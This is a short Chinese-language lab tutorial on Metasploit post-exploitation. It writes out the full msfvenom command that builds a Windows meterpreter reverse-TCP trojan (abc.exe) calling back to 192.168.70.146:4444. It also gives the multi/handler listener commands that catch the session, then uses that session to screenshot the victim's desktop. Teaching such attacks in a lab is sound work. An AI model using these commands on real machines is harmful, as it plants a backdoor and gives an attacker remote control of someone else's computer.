msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。


后渗透——利用kali工具MSF反弹shell_集中控制

实验环境:

  • Windows Server 2008 R2 x64
  • kali

后渗透——利用kali工具MSF反弹shell_集中控制

模拟实验:

首先输入​​msfconsole​​打开软件然后输入​​show payloads​​查看有哪些payloads可以用

后渗透——利用kali工具MSF反弹shell_集中控制_03

然后找到530行的​​windows/x64/meterpreter_reverse_tcp​​前面加use使用,然后​​show options​​查看用法

后渗透——利用kali工具MSF反弹shell_集中控制_04

然后再打开一个终端查看IP,把IP加入到命令​​msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.70.146 lport=4444 -f exe -o abc.exe​​中生成木马文件

后渗透——利用kali工具MSF反弹shell_集中控制_05

然后将文件拖到win2008上

后渗透——利用kali工具MSF反弹shell_集中控制_06

后渗透——利用kali工具MSF反弹shell_集中控制_07

然后再次打开​​msfconsole​​依次输入​​use exploit/multi/handler​​、​​set payload windows/x64/meterpreter_reverse_tcp​​、​​set lhost 192.168.70.146​​、​​exploit​

后渗透——利用kali工具MSF反弹shell_集中控制_08

输入完后执行exe文件

后渗透——利用kali工具MSF反弹shell_集中控制_09

监听到之后可以输入?查看用法

后渗透——利用kali工具MSF反弹shell_集中控制_10

比如输入​​screenshot​​就截到了win2008的桌面

后渗透——利用kali工具MSF反弹shell_集中控制_11

后渗透——利用kali工具MSF反弹shell_集中控制_12